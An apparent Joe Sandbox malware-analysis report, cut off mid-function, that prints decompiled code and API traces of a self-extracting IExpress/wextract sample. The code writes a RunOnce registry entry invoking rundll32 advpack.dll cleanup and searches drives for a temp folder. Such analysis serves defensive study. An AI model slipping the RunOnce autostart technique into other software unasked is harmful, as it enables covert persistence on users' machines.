                                                                                                                                                                                                      0x00a62c3d
                                                                                                                                                                                                      0x00a62c43
                                                                                                                                                                                                      0x00a62c45
                                                                                                                                                                                                      0x00a62c47
                                                                                                                                                                                                      0x00a62c49
                                                                                                                                                                                                      0x00a62c4e
                                                                                                                                                                                                      0x00a62c4e
                                                                                                                                                                                                      0x00a62c47
                                                                                                                                                                                                      0x00a62c32
                                                                                                                                                                                                      0x00a62c20
                                                                                                                                                                                                      0x00a62c50
                                                                                                                                                                                                      0x00a62c54
                                                                                                                                                                                                      0x00a62c57
                                                                                                                                                                                                      0x00a62c64
                                                                                                                                                                                                      0x00a62c66
                                                                                                                                                                                                      0x00a62c6b
                                                                                                                                                                                                      0x00a62c6d
                                                                                                                                                                                                      0x00a62c74
                                                                                                                                                                                                      0x00a62c76
                                                                                                                                                                                                      0x00a62c7c
                                                                                                                                                                                                      0x00a62c7e
                                                                                                                                                                                                      0x00a62c87
                                                                                                                                                                                                      0x00a62c89
                                                                                                                                                                                                      0x00a62c89
                                                                                                                                                                                                      0x00a62c87
                                                                                                                                                                                                      0x00a62c7c
                                                                                                                                                                                                      0x00a62c74
                                                                                                                                                                                                      0x00a62c8e
                                                                                                                                                                                                      0x00a62c95
                                                                                                                                                                                                      0x00a62c98
                                                                                                                                                                                                      0x00a62c98
                                                                                                                                                                                                      0x00a62c9e
                                                                                                                                                                                                      0x00a62ca7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00A66BB0,00A60000,00000000,00000002,0000000A), ref: 00A62C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A66BB0,00A60000,00000000,00000002,0000000A), ref: 00A62C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A62C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00A66BB0,00A60000,00000000,00000002,0000000A), ref: 00A62C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: 01e6a5b5128f7659fd012e095ef13263cbcdb5e4cb10e690e0fbea47e43a7959
                                                                                                                                                                                                      • Instruction ID: 8bca00ba0ff9cdc6a436a825489ba973dc4b32dcc75f2a406fb0857e02e92740
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01e6a5b5128f7659fd012e095ef13263cbcdb5e4cb10e690e0fbea47e43a7959
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB110871600B056BDB20EBF5AD98B6F3B7DAB94795B090125F901F3250DAB4DC43CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A66F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E00A66EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x00a66f45
                                                                                                                                                                                                      0x00a66f4d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A66F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 95bbd11f3d64443c4451021d70676a384bd960a8ec1123c2e76203fa261bad21
                                                                                                                                                                                                      • Instruction ID: 538cdab74f337702a4d32dd8df23ece228fb6a896263f88d86f2c87abceb1c6e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95bbd11f3d64443c4451021d70676a384bd960a8ec1123c2e76203fa261bad21
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 329002642511005797115BB09D1941575B16A5EA02B815960E011D4494DBB190415952
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A6202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                      				_t28 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                      					return E00A66CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E00A6171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                      					E00A6658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xa69a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                      						_t81 = 0xa691e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xa691e5;
                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa691e5);
                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                      							 *0xa68580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      							E00A6171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                      						E00A644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      						E00A6658A( &_v268, 0x104, 0xa61140);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      				 *0xa68530 = _t66;
                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00a6202a
                                                                                                                                                                                                      0x00a62035
                                                                                                                                                                                                      0x00a6203c
                                                                                                                                                                                                      0x00a62041
                                                                                                                                                                                                      0x00a62050
                                                                                                                                                                                                      0x00a6205f
                                                                                                                                                                                                      0x00a62064
                                                                                                                                                                                                      0x00a6206f
                                                                                                                                                                                                      0x00a6208c
                                                                                                                                                                                                      0x00a62094
                                                                                                                                                                                                      0x00a62257
                                                                                                                                                                                                      0x00a62266
                                                                                                                                                                                                      0x00a62266
                                                                                                                                                                                                      0x00a6209a
                                                                                                                                                                                                      0x00a6209b
                                                                                                                                                                                                      0x00a6209d
                                                                                                                                                                                                      0x00a620aa
                                                                                                                                                                                                      0x00a620af
                                                                                                                                                                                                      0x00a620c9
                                                                                                                                                                                                      0x00a620d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a620d3
                                                                                                                                                                                                      0x00a620da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a620da
                                                                                                                                                                                                      0x00a620e2
                                                                                                                                                                                                      0x00a62103
                                                                                                                                                                                                      0x00a6210e
                                                                                                                                                                                                      0x00a62116
                                                                                                                                                                                                      0x00a62122
                                                                                                                                                                                                      0x00a62128
                                                                                                                                                                                                      0x00a6212c
                                                                                                                                                                                                      0x00a62179
                                                                                                                                                                                                      0x00a62194
                                                                                                                                                                                                      0x00a621de
                                                                                                                                                                                                      0x00a621e4
                                                                                                                                                                                                      0x00a62256
                                                                                                                                                                                                      0x00a62256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62256
                                                                                                                                                                                                      0x00a62196
                                                                                                                                                                                                      0x00a62196
                                                                                                                                                                                                      0x00a6219c
                                                                                                                                                                                                      0x00a6219f
                                                                                                                                                                                                      0x00a6219f
                                                                                                                                                                                                      0x00a621a1
                                                                                                                                                                                                      0x00a621a2
                                                                                                                                                                                                      0x00a621a6
                                                                                                                                                                                                      0x00a621a8
                                                                                                                                                                                                      0x00a621b0
                                                                                                                                                                                                      0x00a621b0
                                                                                                                                                                                                      0x00a621b2
                                                                                                                                                                                                      0x00a621b3
                                                                                                                                                                                                      0x00a621bc
                                                                                                                                                                                                      0x00a621c7
                                                                                                                                                                                                      0x00a621cb
                                                                                                                                                                                                      0x00a621f1
                                                                                                                                                                                                      0x00a621f6
                                                                                                                                                                                                      0x00a621fd
                                                                                                                                                                                                      0x00a621ff
                                                                                                                                                                                                      0x00a621ff
                                                                                                                                                                                                      0x00a62204
                                                                                                                                                                                                      0x00a62213
                                                                                                                                                                                                      0x00a62218
                                                                                                                                                                                                      0x00a6221d
                                                                                                                                                                                                      0x00a6221d
                                                                                                                                                                                                      0x00a62220
                                                                                                                                                                                                      0x00a62220
                                                                                                                                                                                                      0x00a62222
                                                                                                                                                                                                      0x00a62223
                                                                                                                                                                                                      0x00a62229
                                                                                                                                                                                                      0x00a6223d
                                                                                                                                                                                                      0x00a62249
                                                                                                                                                                                                      0x00a62250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62250
                                                                                                                                                                                                      0x00a621d2
                                                                                                                                                                                                      0x00a621d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a621d9
                                                                                                                                                                                                      0x00a6213a
                                                                                                                                                                                                      0x00a62141
                                                                                                                                                                                                      0x00a62144
                                                                                                                                                                                                      0x00a6214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62163
                                                                                                                                                                                                      0x00a62172
                                                                                                                                                                                                      0x00a62172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62163
                                                                                                                                                                                                      0x00a620ea
                                                                                                                                                                                                      0x00a620f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A62050
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A6205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A6208C
                                                                                                                                                                                                        • Part of subcall function 00A6171E: _vsnprintf.MSVCRT ref: 00A61750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A620C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A620EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A62103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A62134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A6215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A6218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A621C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A621E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A6223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A62250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                      • API String ID: 178549006-3388056274
                                                                                                                                                                                                      • Opcode ID: 6118055c4c679f9f7fa8765194e850c4c869d8b85938e0da8b37b8831b75b525
                                                                                                                                                                                                      • Instruction ID: 8a510699160e485662bd789507f968eb3d6de794db8495b5347fa2a386de9243
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6118055c4c679f9f7fa8765194e850c4c869d8b85938e0da8b37b8831b75b525
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E512771A00214BBDB20DBA0DC49FFB7B3CEB55700F0546A8FA45E7191EAB59E468F50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 232 a655a0-a655d9 call a6468f LocalAlloc 235 a655fd-a6560c call a6468f 232->235 236 a655db-a655f1 call a644b9 call a66285 232->236 242 a65632-a65643 lstrcmpA 235->242 243 a6560e-a65630 call a644b9 LocalFree 235->243 250 a655f6-a655f8 236->250 244 a65645 242->244 245 a6564b-a65659 LocalFree 242->245 243->250 244->245 248 a65696-a6569c 245->248 249 a6565b-a6565d 245->249 255 a656a2-a656a8 248->255 256 a6589f-a658b5 call a66517 248->256 252 a6565f-a65667 249->252 253 a65669 249->253 254 a658b7-a658c7 call a66ce0 250->254 252->253 257 a6566b-a6567a call a65467 252->257 253->257 255->256 260 a656ae-a656c1 GetTempPathA 255->260 256->254 270 a65680-a65691 call a644b9 257->270 271 a6589b-a6589d 257->271 264 a656f3-a65711 call a61781 260->264 265 a656c3-a656c9 call a65467 260->265 275 a65717-a65729 GetDriveTypeA 264->275 276 a6586c-a65890 GetWindowsDirectoryA call a6597d 264->276 269 a656ce-a656d0 265->269 269->271 273 a656d6-a656df call a62630 269->273 270->250 271->254 273->264 286 a656e1-a656ed call a65467 273->286 280 a65730-a65740 GetFileAttributesA 275->280 281 a6572b-a6572e 275->281 276->264 287 a65896 276->287 284 a65742-a65745 280->284 285 a6577e-a6578f call a6597d 280->285 281->280 281->284 289 a65747-a6574f 284->289 290 a6576b 284->290 298 a657b2-a657bf call a62630 285->298 299 a65791-a6579e call a62630 285->299 286->264 286->271 287->271 292 a65771-a65779 289->292 294 a65751-a65753 289->294 290->292 297 a65864-a65866 292->297 294->292 295 a65755-a65762 call a66952 294->295 295->290 308 a65764-a65769 295->308 297->275 297->276 306 a657d3-a657f8 call a6658a GetFileAttributesA 298->306 307 a657c1-a657cd GetWindowsDirectoryA 298->307 299->290 309 a657a0-a657b0 call a6597d 299->309 314 a6580a 306->314 315 a657fa-a65808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->298 316 a6580d-a6580f 314->316 315->316 317 a65827-a6585c SetFileAttributesA call a61781 call a65467 316->317 318 a65811-a65825 316->318 317->271 323 a6585e 317->323 318->297 323->297
                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00A655A0(void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E00A6468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E00A6468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0xa69a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0xa68b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0xa68a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E00A66517(_t82, 0x7d2, 0, E00A63210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xa69a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0xa691e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0xa691e4);
                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                      										E00A61781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t68 = E00A66952( &_v268);
                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                      																			_t49 = E00A6597D( &_v268, _t103, 1);
                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                      																				L33:
